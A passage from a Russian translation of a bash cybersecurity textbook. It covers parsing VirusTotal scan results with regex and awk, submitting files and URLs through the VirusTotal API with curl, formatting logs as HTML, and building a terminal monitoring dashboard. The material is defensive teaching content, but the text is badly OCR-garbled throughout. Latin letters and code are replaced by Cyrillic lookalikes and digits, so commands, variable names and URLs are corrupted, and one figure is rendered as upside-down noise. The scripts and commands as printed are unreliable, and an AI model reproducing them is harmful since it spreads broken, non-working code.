для соответствия всему регулярному выражению, что позволяет извлекать ответ 
из каждого антивирусного ядра по отдельности, а не из большой группы. 


Хотя этот метод работает, наилучшее решение можно создать с помощью сценария 
Баѕћ, как показано в примере 11.2. 


Пример 11.2. үјѕоп.ѕһ 


#!/61п/Ба$й - 

# 

Вай и кибербезопасность 
УЕ] оп. 5В 


Описание: 
Поиск вредоносных программ в файле 3$0№ 


Использование: 
УЕ) зоп.амк [<јѕоп +11е>] 
<јѕоп +11е> Файл с результатами \М1ги$Тофа1 
по умолчанию: Са1с_\М1ги$Тофа1 .+хе 


{ЕЕ +- 


ВЕ='^.(.*)...\{.*4е%ес+е..(.*),..мег$.*гези1%....(.*).,. .ираа*е. *$' © 


Е№="${1:-Са1с_\1ги$Тофа1.+х*}" 


ѕеа -е '5/{"ѕсапѕ": {/&\п /' -е '$/},/&\п/в' "ФЕМ" | @ 
мһі1е геаа АГІМЕ 
ао 


1+ [[ ФАЕТМЕ =~ $КЕ 1] © 
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ёһеп 
МІКОЅ="${ ВАЅН_ КЕМАТСН[1]}" ө 
ҒООМ№О="${ВАЅН_КЕМАТСН[2]}" 
ВЕЗЕТ="${ВАЗН_ВЕМАТСН[3]}" 


1+ [[ $Р00№0 =~ .*6гие.* ]] [5] 
{Веп 
есһо $УТКУ$ "- гези1*:" $КЕЗЁЕТ 
11 
+1 
аопе 


© Это сложное регулярное выражение (или ВЕ) ищет строки, содержащие слова 
РЕТЕСТ, КЕЅЏІТ и ОРР”АТЕ в указанной последовательности. Более того, ВЕ также на- 
ходит в пределах любой строки три подстроки, которые соответствуют этим трем 
ключевым словам. Подстроки обозначены круглыми скобками; скобок не должно 
быть в строках, которые мы ищем, — они скорее являются синтаксисом ВЕ, обо- 
значающим группировку. 


Рассмотрим в этом примере первую группу. ВЕ заключено в одинарные кавычки. 
Здесь может быть много специальных символов, но нам не нужно, чтобы они были 
интерпретированы как специальные символы оболочки; желательно, чтобы они 
передавались буквально процессору гевех. Следующий символ, ^, говорит о том, что 
этот поиск следует привязать к началу строки. Символ «точка» (.) соответствует 
любому символу в строке ввода. Затем идет группа любых символов (.), повторя- 
ющаяся любое количество раз, обозначаемое символом *. 


Итак, сколько символов потребуется для заполнения этой первой группы? 
Мы должны и дальше просматривать ВЕ, чтобы найти соответствия. То, что должно 
находиться после данной группы, — это три символа, за которыми следует левая 
скобка. Итак, теперь мы можем описать эту первую группировку как все символы, 
начиная со второго символа строки вплоть до трех символов перед левой скобкой, 
но эти три символа исключаются. 


Данная ситуация похожа на ситуацию с другими группами, местоположение ко- 
торых ограничивается точками и ключевыми словами. Да, это довольно жесткий 
формат, но предсказуемый. Данный сценарий мог быть написан для более гибкой 
обработки формата ввода (см. упражнения в конце главы). 


Ө Команда $е4 готовит наши входные данные для более легкой обработки. Она са- 
мостоятельно помещает в строку исходное ключевое слово ] ЗОМ ѕсапѕ и связанные 
с ним знаки пунктуации. Далее в конце каждой правой скобки (с запятой после нее) 
также добавляется символ новой строки. В обоих выражениях редактирования 
символ & в правой части подстановки представляет собой то, что было сопоставлено 
с левой стороны. Например, во второй замене амперсанд является сокращением 
для правой скобки и запятой. 
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© Здесь используется регулярное выражение. Не задавайте $ВЕ внутри кавычек, 
иначе $ВЕ будет соответствовать таким специальным символам, как литералы. Чтобы 
определить поведение регулярного выражения, не заключайте его в кавычки. 


Ө Если в регулярном выражении используются скобки, они обозначают подстроку, 
которую можно извлечь из переменной массива оболочки ВА$Н_ВЕМАТСН. Индекс 1 
обозначает первую подстроку ит. д. 


© Это еще один вариант использования сопоставления регулярных выражений. 
Мы ищем слово ие в любом месте строки. Здесь делается предположение о наших 
входных данных: что слово {гие не появляется ни в каком другом поле, кроме того, 
в котором мы ожидаем его встретить. Мы могли бы сделать сопоставление более 
конкретным (например, расположив слово ие рядом со словом 4еесеа), но такой 
оператор гораздо лучше читается и будет работать до тех пор, пока четыре буквы 
1-7-и-е не появятся в данной последовательности в любом другом поле. 


Для решения этой задачи не обязательно использовать регулярные выражения. 
В примере 11.3 приводится решение с использованием амк. Теперь в амк можно эф- 
фективно задействовать регулярные выражения, но они вам здесь не нужны из-за 
другой мощной функции амк: синтаксического разбора входных данных на поля. 


Пример 11.3. У/5оп.амК 


# Ваѕһ и кибербезопасность 

# УЕ] 5оп.амК 

# 

# Описание: 

# Поиск вредоносных программ в файле 3$0№ 

# 

# Использование: 

# УЕ] воп.амК <] оп +11е> 

# <]5оп Ғі1е» Файл с результатами \М1ги$Тофа1 
# 


ЕМ="${1:-Са1с_\1ги$Тофа1.+х*}" 


ѕеа -е '5/{"ѕсапѕ": {/&\п /' -е '$/},/&\п/в' "ФЕМ" | о 
амк ' 

МЕ == 9 { [2] 
СОММА=", " 

ОООТЕ="\"" © 

14 ( $3 == "Еғгие" СОММА ) { [4] 

МІК0Ѕ=$1 [5] 

[6] 


вѕиЫ(ОООТЕ, "", МІКЏЅ) 


ВЕЗЕТ=$7 
взи6(ОЦОТЕ, "", ВЕЗЕТ) 
2$и6(СОММА, "", ВЕЗЕТ) 
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ргіпі МІКОЅ, "- гези1{:", ВЕЗЁТ 
}' 


© Мы начинаем с той же предварительной обработки входных данных, что и в пре- 
дыдущем сценарии. На этот раз передаем результаты в амк. 


Ө Код внутри этих фигурных скобок будет выполняться только для входных строк 
с девятью полями. 


Ө Мы устанавливаем переменные для хранения этих строковых констант. Обратите 
внимание, что мы не можем использовать одинарные кавычки вокруг одного симво- 
ла двойной кавычки. Почему? Потому что весь сценарий амк защищен (от интерпре- 
тации специальных символов в оболочке) одинарными кавычками (вернитесь на три 
строки назад или перейдите в конец этого сценария). Вместо этого мы экранируем 
двойную кавычку, поставив перед ней обратный слеш. 


Ө Здесь третье поле входной строки сравнивается со строкой "4гие", поскольку 
в аик сочетание строк подразумевает конкатенацию. Мы не используем знак плюс 
для добавления двух строк, как это делается в некоторых языках; мы просто ука- 
зываем их рядом друг с другом. 


Ө Как и в случае с $3, который используется в условии 1+, $1 здесь относится к но- 
меру поля входной строки — первому слову ввода. Это не переменная оболочки, 
ссылающаяся на параметр сценария. Помните про одинарные кавычки, в которые 
заключен этот сценарий амк. 


Ө 55и6 — это функция амк, выполняющая глобальное замещение. При поиске 
через третий аргумент она заменяет все вхождения первого аргумента вторым. 
Поскольку второй аргумент — это пустая строка, то из строки в переменной УІКЏЅ 
(которой было присвоено значение первого поля строки ввода) удаляются все 
символы кавычек. 


Остальная часть сценария, выполняющая эти замены и выводящая результаты, во 
многом совпадает с предыдущим. Помните, что в амк сценарий продолжает читать 
Ат и выполнять код по одному разу для каждой строки ввода до его конца. 


Сканирование файла 


Вы можете выгрузить новые файлы для анализа в УтизТова|, если информа- 
ции о них еще нет в базе данных. Для этого вам нужно отправить запрос НТМІ. 
РОЅТ на ЧВТ-адрес Һрѕ://млмл.уігиѕїоїаі.сот/мќарі/м2/#е/ѕсап. Вы также должны 
предоставить свой ключ АРІ и путь для выгрузки файла. Ниже приведен пример 
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использования файла \Лп4о\уз са1с. ехе, который обычно можно найти в каталоге 
С: \И1паом$ \ 5у $ет32: 


сиг1 --гедиеѕ+ РОЅТ --иг1 'ИЕр$: / /ммм. мігиѕо+а1. сот/уёарі/№2/+11е/ѕсап' 
--Ғогт 'арікеу=гер1асеміһарікеу' --Ғогт '+11е=@/с/\1пдом$ /5уз{ет32/са1с.ехе' 


Результаты после выгрузки файла будут получены не сразу. Возвращается, напри- 
мер, следующий объект ЈЅОМ№, содержащий метаданные файла, который можно 
использовать для последующего получения отчета с применением идентификатора 
сканирования или одного из значений хеш-функции: 


{ 
"ѕсап_ іа": "5543а258а81952464774ас619ефа8267+42822е3+446с9709+а4с25+9++94226-1...", 


"ѕһа1": "7ҒҒерҒее463сӨ5ада8731е8596+20еббеб98Ь5ға", 

"гезоигсе": "5543а258а81952404774асб19еҒа8267#42822е3#+446с9709Ғайс25+а+ғ94226", 
"геѕропѕе_сойе": 1, 

"ѕһа256": "5543а258а81952464774ас619е+а8267+142822е3+446с9709+а4с25+49++94226", 
"регта11пК": "Вере : / /ммм. мігиѕћоа1. сот/Ғ11е/5543а258а8195240477аасб19еҒа8207...", 
"таѕ": "482с445еза484#31са2638а4338е5ѕға" , 

"уегроѕе тѕв": "Ѕсап гедиеѕї ѕиссеѕѕҒи11у диеџеа, соте баск Тафег Рог ©һе герогї" 


} 


Сканирование ОКі-адресов, доменов и ІР-адресов 


УігиѕТоќа! также предоставляет возможность сканирования определенного ОКІ., 
домена или ІР-адреса. Все вызовы АРІ схожи в том, что они отправляют НТТР- 
запрос СЕТ на соответствующий О ВТ--адрес, указанный в табл. 11.3 с соответству- 
ющими параметрами. 


Таблица 11.3. \/ігиѕТоќа! ВЕ АРІ 


Описание Запросить УВЕ Параметры 
Отчет по ОВГ. | ћрѕ:/ /уууу.уігиѕсоса[.сот/уќарі/у2 /и/тероге арікеу, геѕоигсе, 

ао, ѕсап 
Доменный отчет | ҺСрѕ:/ Лууу.уігиѕќоќа[.сот/усарі/у2 /Аоташт/тгероге арікеу, Чоташ 
Отчет по ІР ћесрѕ:/ учуу .уігиѕсоса[.сот,/усарі/у2 /лр-а4@гезз/тероге | арікеу, р 


Вот пример запроса отчета сканирования по ОКІ-адресу: 


сиг1 'ВЕЕрз : //ммм.мігиѕ+оа1. сот/\ар1/\2/иг1/герог*?ар1Кеу=гер1асем1{Пар1Кеу 
&гезоигсе=ммм .оге111у. сота111іпҒо=Ға15е&ѕсап=1' 


Параметр ѕсап=1 автоматически отправит ОКІ -адрес для анализа, если его еще 
нет в базе данных. 
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Выводы 


Используя только командную строку, нельзя обеспечить тот же уровень произ- 
водительности, что предоставляют полнофункциональные инструменты реверс- 
инжиниринга. Но с ее помощью можно обеспечить проверку исполняемого файла. 
Не забывайте, что анализировать подозрительные вредоносные программы следует 
только на системах, отключенных от сети, и помните о проблемах конфиденциаль- 
ности, которые могут возникнуть при выгрузке файлов в УтизТоба| или другие 
подобные сервисы. 


В следующей главе мы рассмотрим, как улучшить визуализацию данных после их 
сбора и анализа. 


Упражнения 


1. Создайте регулярное выражение для поиска в двоичном файле одиночных 
печатаемых символов, разделенных одиночными непечатаемыми символами. 
Например, р. а. $. ѕ. м. о. г. 4, где. представляет непечатаемый символ. 


2. Выполните поиск вхождения одного печатаемого символа в двоичном файле. 
Вместо того чтобы печатать найденные символы, распечатайте символы, ко- 
торые не были найдены. Чтобы немного упростить упражнение, учитывайте 
только буквенно-цифровые символы. 


3. С помощью одной команды напишите сценарий для взаимодействия с АРІ 
УігиѕТоќѓаІ. Используйте параметр -Н для проверки хеша, -Е — для загрузки 
файла и -0у — для проверки ОКІ-адреса. Например: 


$ ./МЕ.зИ -Һ а6349697с37422+5еа141841е3с89е54. 


Рреестеа: и32.МаппаСгурЕТЕ. Тго)ап 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ћірѕ://Лум.гарійсубегорѕ.соту/. 


Форматирование 
и отчетность 


Для получения максимальной пользы все собранные ранее и проанализированные 
данные должны быть представлены в понятном и удобочитаемом формате. Часто 
формат стандартного вывода командной строки не позволяет выводить большое 
количество информации. Поэтому для улучшения читаемости можно воспользо- 
ваться дополнительными методами. 


Используемые команды 


В этой главе для форматирования вывода мы будем применять команду ёри+. 


риё 


Команда риф, используя базу данных +егтіп#о, управляет вашими сеансами работы 
с терминалом. С помощью команды ёри можно управлять различными функция- 
ми терминала, такими как перемещение или изменение вида курсора, изменение 
свойств текста и очистка определенных областей экрана терминала. 


Общие параметры команды 


с1еаг — очистить экран. 


с01$ — распечатать количество столбцов терминала. 


1іпеѕ — распечатать количество строк терминала. 


а 
а 
О сир <х> <у> — переместить курсор в положение <х>, <у>. 
а 
а 


гтсир — вернуться к обычному экрану терминала. 
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О ѕе+аб — установить цвет фона терминала. 


С ѕеїа+ — установить основной цвет терминала. 


О ѕтсир — сохранить текущий экран терминала и очистить экран. 


Форматирование для отображения 
в виде НТМЕ-документа 


Если результат не требуется просматривать непосредственно в командной стро- 
ке, отличным способом обеспечить аккуратное и понятное форматирование вы- 
водимых данных будет преобразование информации в формат НТМГТ. Данные 
в формате НТМІ. удобно выводить на печать, используя встроенные в браузер 
возможности для печати. 


Полный синтаксис НТМГ, выходит за рамки этой книги, здесь же мы рассмотрим 
основные принципы форматирования. НТМТ. — это компьютерный язык, который 
определяется рядом тегов, управляющих форматированием данных и их поведени- 
ем в браузере. В НТМІ. обычно используются открывающие теги (<Неа4>) и соот- 
ветствующий закрывающий тег, содержащий символ слеша (</пеад>). В табл. 12.1 
перечислены несколько наиболее популярных тегов и их назначение. 


Таблица 12.1. Основные НТМЕ-теги 


Тег Назначение 

<> Внешний тег в НТМІ -документе 

<Боду> Тег, содержащий основное содержимое НТМТ-документа 
<һҺ> Заголовок 

<> Полужирный текст 

<о|> Нумерованный список 

<и[> Маркированный список 


В примере 12.1 показан образец документа НТМГ. 


Пример 12.1. Заготовка НТМЕ-документа 


<Ни1> © 
<Боду>› Ө 
<һ1>Тһіѕ 15 а һеайег</һ1> 
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<Б>+һіѕ 1$ 6014 фехЕ</Ь> 
<а Пге+=" Ир: //ммм.оге111у. сот" >ЕН1$ 15 а 11пК</а> 
‹01> Ө 

<11>ТН1$ 15 1151 ібет 1</11> Ө 

<1і>Тһіѕ 15 1151 1%ет 2</11> 


</о1> 
<{аб1е Богдег=1> Ө 
<і> © 


<{а>Ком 1, Со1итп 1</+а> Ө 
<еа>Ком 1, Со1итп 2</%а> 

</&р> 

«г> 
<ъа>Ком 2, Со1итп 1</%а»> 
<{а>Вом 2, Со1итп 2</%а> 

</&р> 

</%аБ1е» 
</боау> 
</ћЕм1> 


© НТМГ-документы должны начинаться и заканчиваться тегом <ћ+т1». 
Ө Основное содержимое веб-страницы находится внутри тега <Боау>. 


© Тег ‹о1> предназначен для создания нумерованного списка, а тег ‹и1> — для 
создания маркированного. 


© Тег <11> определяет элемент списка. 
Ө Тег <+аб1е> используется для определения таблицы. 
Ө Тег ‹+г> применяется для определения строки таблицы. 


Ө Тег <+а> используется для определения ячейки таблицы. 


Для получения дополнительной информации о НТМІ обратитесь к справочным 
материалам НТМЕ5 Консорциума Моа МЛае Уер (НЕр://Бу/291ТВЬ?). 


На рис. 12.1 показано, как выглядит страница из примера 12.1 при отображении 
в браузере. 


Чтобы упростить вывод в НТМТ, вы можете создать простой сценарий для упа- 
ковки элементов в теги. Сценарий, показанный в примере 12.2, принимает строку 
и тег, после чего выводит эту строку, окруженную тегом, а затем символ новой 
строки. 
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Ті 15 а Веадег 


15 15 ьо] ќехё 115 15 а ЦиК 


1. Ті 1$ і Нет 1 
2. Ті 15 115 йет 2 


Вот 1, Сошши 1 [Вож 1, Соіштп 2 
Ком 2, Сошши 1|Вом 2, Соіштп 2 


Рис. 12.1. Визуализированная НТМІ-страница 


Пример 12.2. ѓадіё.5ћ 


#!/61п/Ба$й - 

# 

Ваѕһ и кибербезопасность 
арі. ѕһ 


Описание: 
Поместить открывающие и закрывающие теги вокруг строки 


Использование: 

ЖаріЄ.ѕһ <фаё> <5%г1п5> 
<фаё> Используемый тег 
<ѕ1гіпе»> Строка с тегами 


{+++ 


ргіпеЕ '<%5>%5</%5>\п' "${1}" "$4{2}" "${1}" 


Полученный вывод также можно превратить в простую функцию, которую впо- 
следствии можно включить в другие сценарии: 


ФипсЕ1оп арії () 


{ 
} 


рпіпЕЕ '<%5>%5</%5>\п' "$4{1}" "${2}" "91р" 


Вы можете использовать НТМТ-теги для переформатирования практически 
любого типа данных, после чего чтение этих данных значительно облегчится. 
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В примере 12.3 показан сценарий, читающий файл АрасВе ассеѕѕ .108, приведенный 
в примере 7.2. Для переформатирования и вывода файла журнала в виде НТМІ. 
используется функция +арії. 


Пример 12.3. ме одёте.$И 
#!/61п/Ба$й - 


# 


{Ен нн 


Описание: 
Чтение веб-журнала Арасһе и его вывод в виде НТМЕ 


Использование: 
меБ1оётф.$Н < іприё.Ғі1е > оифри*.+11е 


ФипсЕ1оп +арії() 


{ 
} 


Вай и кибербезопасность 
меб оф . ѕћ 


реТПЕЕ '<%5>%5</%5>\п' "$4{1}" "$4{2}" "${1}" 


# основные теги заголовка 


есһо 
есһо 
есһо 


есһо 
есһо 
есһо 
есһо 
есһо 
есһо 
есһо 
есһо 
есһо 
есһо 


"<ҺЕт1>" 

"<Боду>" 

"<ћ1>$1</һ1>" # заголовок 

"<ъар1е Богаег=1>" # таблица с границами 
"СЕбУ" # новая строка таблицы 
"<ЕҺ>ІР Адагеѕ5</Еһ>" # заголовок столбца 
"<Еһ>ра+е</+һ>" 


"<ЕЋ>0КІ Кедоеѕ+еа</һ>" 
"<Еһ>Ѕ+а+иѕ Соае</&һ>" 
"<Еһ>Ѕ5іле</+һ>" 
"<Еп>Кефеггег< /ЕН>" 
"<Еһ>0ѕег Авеп{</ЕН>" 


"уг" 


мһі1е геаа +1 +2 +3 +4 #5 #6 #7 +8 +9 +109 +11 +12р1и5 


о 


есһо 

арії 
арії 
арії 
арії 
арії 
арії 


"Ер" 
"жа" 
"жа" 
"жа" 
"жа" 
"жа" 
"жа" 


"Сет" 
"(ғар $65" 
"${Е6} $7" 
"ео" 
"${ғ10}" 
"Ф{ғ11}" 


ө 
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Жарії "Фа" "${+12р1и$}" 
есһо "</фг>" 
аопе < $1 


# закрывающие теги 
есһо "</фаб1е>" 
есһо "</Боау»" 
есһо "</ҺЕм1»>" 


© Существует несколько способов распечатать длинный текст. Мы могли бы ис- 
пользовать здесь документ вместе с программой са*, допустим, так: 


са <<ЕОЕ 
<ћЕм1> 
<Боду> 
<ћ1>$1</һ1> 


ЕОЕ 
Преимущество этого кода в том, что не требуется повторять все команды еспо. 
Обратите внимание: все равно потребуется выполнить замену $1, если при вызове 


не будет ссылки на ЕОЕ в любой форме. Однако в этом решении есть один недоста- 
ток: в таком случае мы не сможем добавлять в наш ввод комментарии. 


Ө Файл журнала — это файл фиксированного формата, по крайней мере для не- 
скольких первых полей. Здесь мы можем прочитать каждую строку из файла жур- 
нала и разобрать ее на поля. Для чтения всех полей в массив можно использовать 
конструкцию геаа -а КАОЕТХТ, по одному полю для каждого индекса. Но при таком 
подходе становится сложно распечатать все оставшиеся поля, расположенные по- 
сле 12-го. Поэтому все оставшиеся слова были включены в последнее поле, которое 
мы назвали #12р1иѕ. 


Ө Обратите внимание, что в этой и следующей строках два аргумента заключены 
в пару двойных кавычек. В данной строке объединены аргументы +4 и #5. После 
того как их совместно взяли в кавычки, для сценария арії они превращаются 
в один аргумент ($2). Таким образом можно сделать вывод, что #12р1иѕ следует 
заключить в кавычки. При этом все слова в данном поле будут рассматриваться 
как один аргумент арії. 


На рис. 12.2 показан пример вывода из примера 12.3. 


Прежде чем отправлять эти данные в сценарий, например в меб1о8+т* . $, кото- 
рый их отформатирует, их следует отфильтровать и отсортировать. Для филь- 
трации и сортировки данных можно воспользоваться методами, описанными 
в главе 7. 
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цѕ'зшубојдәм ғи ебояча кипезицелвиа "т ‘иа 


„О'ЄР/хозәли 10Т00105/04225 
(о'єр:лш 97$ ГМ ОРЛА) ОЛ 


$8780606Р123Г>бузпаотуэшатузату/ 190, 


„О'Срухоуэи 10100102/04>ә9)) 
(о'єр:л 7$ Іх ѕморшлу) 05/20, 


16рє8р60<12552'ађувәр47шешуѕә/ 190, 


„О'ЄР/ХоЈәл 10100105/04235 021 
А СУ] = КЕ 


(о'ерглл “176 ТМ Зори) О", 


„О'Єр/хоЈәлҹ Т0100102/0Ҹэә0) 
(о'єў:л2 "175 ІМ $ориу\) 0'ѕ/еПт2оу{, 


„О'ЄР/хоЈәл 10100105/04225) 


„О'ЕР/Хозәл: 10100105/04235) 
(0'єр:л2 9 ІМ ѕморшу\) 0'с/т2оу{,, 


з0ә5үұ 1951 


30]-$59998 
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Создание панели мониторинга 


Панели инструментов полезны, если требуется отобразить несколько блоков ин- 
формации, меняющейся со временем. Панель инструментов, которую мы далее 
рассмотрим, отобразит выводы трех сценариев и станет обновлять их через равные 
промежутки времени. 


Здесь используются графические функции окна терминала. Вместо того чтобы 
просто прокручивать данные страницу за страницей, сценарий каждый раз будет 
перерисовывать экран с одной и той же начальной позиции, чтобы при перерисовке 
он полностью обновлялся. 


Чтобы сценарий можно было переносить между различными программами, за- 
пущенными в терминале, нужно использовать команду +ри*, которая будет запра- 
шивать последовательность символов, выполняющих графические функции для 
открытого в данный момент окна программы. 


Поскольку экран постоянно «перерисовывается», вы не можете просто переме- 
ститься в верхнюю часть экрана и восстановить результат. Почему? Поскольку 
при следующей итерации могут быть отображены более короткие строки, чем 
в предыдущем выводе, старые данные с экрана следует удалить. 


Сначала следует очистить экран, но, если на нем перед заполнением ничего не будет 
(например, из-за задержек в командах, предоставляющих вывод для отображения), 
этот эффект будет раздражать. В таком случае вы можете отправлять весь вывод 
через функцию (нашей собственной разработки), печатающую каждую строку вы- 
вода, и добавлять в конец каждой строки последовательность символов, которая 
будет очищать каждую строку по ее окончании, удаляя тем самым весь предыду- 
щий вывод. Данная функция позволит немного украсить вывод, завершая каждую 
строку пунктирной линией. 


В примере 12.4 показано создание экранной панели управления, содержащей три 
отдельных раздела вывода. 


Пример 12.4. уүерааѕћ.ѕһ 


#1! /61п/Ба$й - 

# 

Каріа Субегѕесигі+у 0рѕ 
мебааѕћ. ѕһ 


Описание: 


# 
# 
# 
# 
# Создание информационной панели 
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# Заголовок 


# Метки столбцов, а затем 
# восемь строк гистограммы 


# некоторые важные постоянные строки 

ОРТОР=$ (риё сир @ 9) Ф 
ЕКАЅ2Е01=$ (Ери? е1) 

КЕМ=$ (фри геу) # негативное изображение 

ОЕЕ=$ (Ёри ѕ2г0) # общий сброс 

$МИЕ=$ (Ёри $ти1) # режим подчеркивания включен (пуск) 
КМО =$ (Ёри гти1) # режим подчеркивания выключен (сброс) 
СОШОММ№Ѕ=$ (риё со15) # ширина нашего окна 

# РАЅНЕЅ (ТИРЕ)='------------------------------------ ' 

ргіп -у РАЅНЕЅ '%%*5' ФСОГОММЅ '-' ө 
РАЅНЕЅ=${АЅНЕЅ// /-} 


# 
# ргбесЕ1оп - напечатать фрагмент экрана 
# напечатать $1-тапу строк из ѕ&аіп 
# каждая строка представляет собой полную строку текста 
# с последующим стиранием до конца строки 
# разделы заканчиваются штриховой линией 
# 
Ғипсъіоп ргЅес+іоп () 
у 
Іоса1 -1 і © 
Ғог((1=0; 1 < ${1:-5}; 1++)) 
ао 
геаа а1іпе 
рг1пЕ+ '%5%5\п' "фа1іпе" "${ЕКАЅ2Е01}" [4] 
опе 
ргіпЕЕ '%5%5\п%5' "ФЮАЅНЕЅ" "${ЕКАЅ2Е0І }" "{ЕКАЅ2Е01 }" 
} 
Ғипсёіоп с1еапир() 5) 
{ 
1+ [[ -п $В6РТЬ ]] 
©һеп 
кі11 %1 ө 
ги -Е ФТМРЕІІЕ 
ТІ 


} &> /деу/пи11 [7] 
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{гар с1еапир ЕХТТ 


# запустить процесс Бе 
ТМРЕТЬЕ=$ (+етр11е) [8] 
{ БазН ёаі1соипё.5һ $1 | \ 


баѕһ 11\еБаг.зН > $ТМРЕШЕ ; } & [9] 
ВСРТО=$! 
с1еаг 
мһі1е гие 
ао 
ргіпЕ '%$' "$ИРТОР" 


# заголовок: 
есһо "${КЕМ}Каріа Субег Ор$ СВ. 12 -- Ѕесигі+у ВазИБоага${0ЕЕ}" \ 
| ргзес&1оп 1 


{ П0] 
ргіпЕҒ 'соппес*10п$:%44а %5\п' \ 
$(пеёѕёа -ап | веер 'ЕЅТАВ' | мс -1) "$(аафе)" 
} | ргѕесёіоп 1 


{ есһо "${5М0І }ууттаа${ мог }" \ 
"$ {5миЕ }пИми$ $${ВМИЕ}" \ 
"${5муЕ}сочпЕ оф емепе5%{ КМО" 
{а11 -8 $ТМРЕТЕЕ 
} | ргѕесёіоп 9 
$1еер 3 
опе 


© Команда ёри+ предоставляет независимую от терминала последовательность 
символов, позволяющую переместиться в левый верхний угол экрана. Чтобы 
не вызывать данную команду при каждом цикле, мы вызываем ее только один раз 
и сохраняем вывод для повторного использования при каждой итерации. Далее 
следуют другие вызовы специальных последовательностей, сохраненных для по- 
вторного использования. 


Ө Существует несколько способов создания пунктирной линии. Здесь мы выбрали 
один, хоть немного и замысловатый, но очень интересный вариант. При этом двух- 
этапном процессе используется заполнение функцией ргіпё+ всей пустой резуль- 
тирующей строки. Символ * указывает функции ргіпё# использовать для задания 
ширины отформатированного поля первую переменную. В результате получается 
строка из 49 пробелов и одного знака минус. Напечатанная строка сохраняется 
в переменной, заданной параметром -у. Вторая часть создания пунктирной линии 
заключается в том, чтобы заменить каждый пробел знаком минус (двойной слеш 
указывает БазВ заменить не только первое, но и все остальные вхождения). 
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9 Объявление в нашем сценарии переменной 1 как локальной — хорошая практика, 
хотя для нашего сценария это некритично. Тем не менее так ваш цикл #ог не будет 
изменять какой-либо другой индекс или счетчик. 


© Ккаждой строке, отправляемой через данную функцию, мы добавляем указание 
егазе-бо-еп4-оЕПте («стереть до конца строки») как в текущей, так и в следующей 
функции рг1п+. После печати пунктирной линии вторая функция ргіпё+ стирает 
следующую строку, где курсор будет находиться до следующей итерации. 


© Функция очистки вызывается при выходе из сценария панели мониторинга, 
когда пользователь для прерывания и выхода из сценария нажмет сочетание кла- 
виш СНС. Как и наша функция очистки в сценарии +аі1соиџпё. ѕћ (см. главу 8), эта 
функция завершит работу функций, находящихся в фоновом режиме. 


Ө В отличие от предыдущей версии, где системный вызов кі11 отправляет сигнал 
определенному процессу, здесь мы используем нотацию %1, чтобы дать системному 
вызову К111 указание, согласно которому сигнал должен быть передан всем процес- 
сам, запущенным в результате работы процесса в фоновом режиме. Все эти процессы 
считаются частью одной и той же «работы». Их рабочие номера ($1, %2, %3 ит. д.) 
определяются порядком их размещения в фоновом режиме. В этом сценарии у нас 
есть только один фоновый процесс. 


Ө Мы перенаправляем вывод в функцию с1еаг таким образом, что все выходные 
данные, поступающие из $40 или $ 4егг, будут отброшены. Такая очистка гаран- 
тирует отсутствие любых неожиданных сообщений, хотя ничего подобного мы и не 
ожидаем (это плохо для отладки, но экран будет намного чище). 


Ө Команда +етрғі1е генерирует уникальное имя и проверяет, не используется ли 
оно в данный момент. В результате нам будет известно, что, независимо от количе- 
ства запущенных экземпляров сценария и расположенных рядом других файлов, 
для этого сценария рабочий файл будет доступен. В функции с1еаг есть код, уда- 
ляющий данный файл при каждом выходе из сценария. 


© Эта строка запускает два сценария, которые описаны в главе 8. Данные сценарии 
подсчитывают строки, добавляемые в конце файла. Фигурные скобки группируют 
все процессы этого конвейера команд вместе и помещают в «фон», отключая их от 
ввода с клавиатуры. Эти процессы и все, что они создали, являются частью зада- 
ния 1 (%1), то есть задания, работу которого прекратит функция с1еаг. 


© Каждый раздел вывода отправляется отдельно в функцию ргѕесёіоп. Команды 
для раздела не нужно группировать внутри фигурных скобок, если для этого 
раздела одна команда генерирует вывод. Это относится к первым трем разделам, 
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но четвертому разделу для группировки двух операторов (еспо и +аі1), записы- 
вающих вывод, требуются скобки. Во втором разделе фигурные скобки хотя и не 
нужны, но предусмотрены в случае, если мы когда-нибудь захотим расширить этот 
раздел и иметь разные выходные данные. Команды для раздела не нужно группи- 
ровать внутри фигурных скобок, если одна команда генерирует вывод. Для всех 
остальных разделов в качестве меры предосторожности при расширении можно 
сделать то же самое. Обратите внимание на небольшую разницу в синтаксисе 
между использованием фигурных скобок в этой и предыдущей строке с пометкой. 
Нам не нужна точка с запятой, потому что мы помещаем закрывающую скобку на 
новую строку. 


На рис. 12.3 показан пример вывода сценария панели управления. 


Ѕес0рѕ м/БазН СВ. 12 -- Ѕесигії+у БазНБоаг9 


бер 17 21:44:37 (пт-арр1е:1348): СЕК-СВТТТСАЕ **: ЧЕК _и19деЕ Пеѕігоу: аѕѕег 
бер 17 21:44:37 (пт-арр1е:1348): СЕК-СВТТТСАЕ **: ЦК мібдеї беѕїігоу: аѕѕег 
бер 17 21:45:40 м1р250: Ғаі1ей Ёо іпіёіаёе зсНед ѕсап 

бер 17 21:45:40 (пт-арр1е:1348): СЕК-МАВМТМС **: Сап'Ё ѕеЁ а рагепі оп мійд 
бер 17 21:45:40 (пт-арр1е:1348): СЕК-СВТТТСАЕ **: дЁК мійдеі Пеѕігоу: аѕѕег 
ууттад Һһтт5=5 соипЕ оЁ еуепіѕ 

180917 214558 10:#ННННННННЕ 

180917 214603 0:# 

180917 214608 [<] 
180917 214613 ө 
180917 214618 5: НИНЕ 

180917 214623 19 НННННННННННННННННЕЕ 
180917 214628 20 : НННННННННАННННАННЕЕ 
180917 214633 19 ЗННННННННАННННННННЕ 


Рис. 12.3. Вывод на панели управления 


Выводы 


Полученные ранее данные принесут пользу только в том случае, если будут удоб- 
ны для чтения пользователю, которому эта информация предназначалась. НТМІ. 
предоставляет простой способ форматирования данных для отображения на экране 
или для печати. Панель мониторинга, созданная в этой главе, может быть особенно 
полезной при отслеживании информации в режиме реального времени. 


В следующей главе мы рассмотрим, как командная строка и Баз могут помочь вам 
выполнить тестирование на проникновение. 
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Упражнения 


1. Измените сценарий мебааѕћ.ѕһ так, чтобы захватить два аргумента командной 
строки, определяющие записи журнала, используемого для мониторинга. На- 
пример: 


.Гмерааѕћ.ѕһ /уаг/105/арасйе2/еггог.105 /уаг/105/араспе2/ассе$$.105 


2. Напишите сценарий, подобный примеру 12.3, который преобразует журнал 
ошибок Арасһе в НТМГ-код. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт Һрѕ://м\м\.гаріасубегорѕ.соту/. 


Часть Ш 


Тестирование 
на проникновение 


Пусть планы твои пребывают во тьме, 
непроницаемые, словно ночь, так, 
чтобы, когда ты двинешь свои силы, они 
обрушились подобно молнии'. 


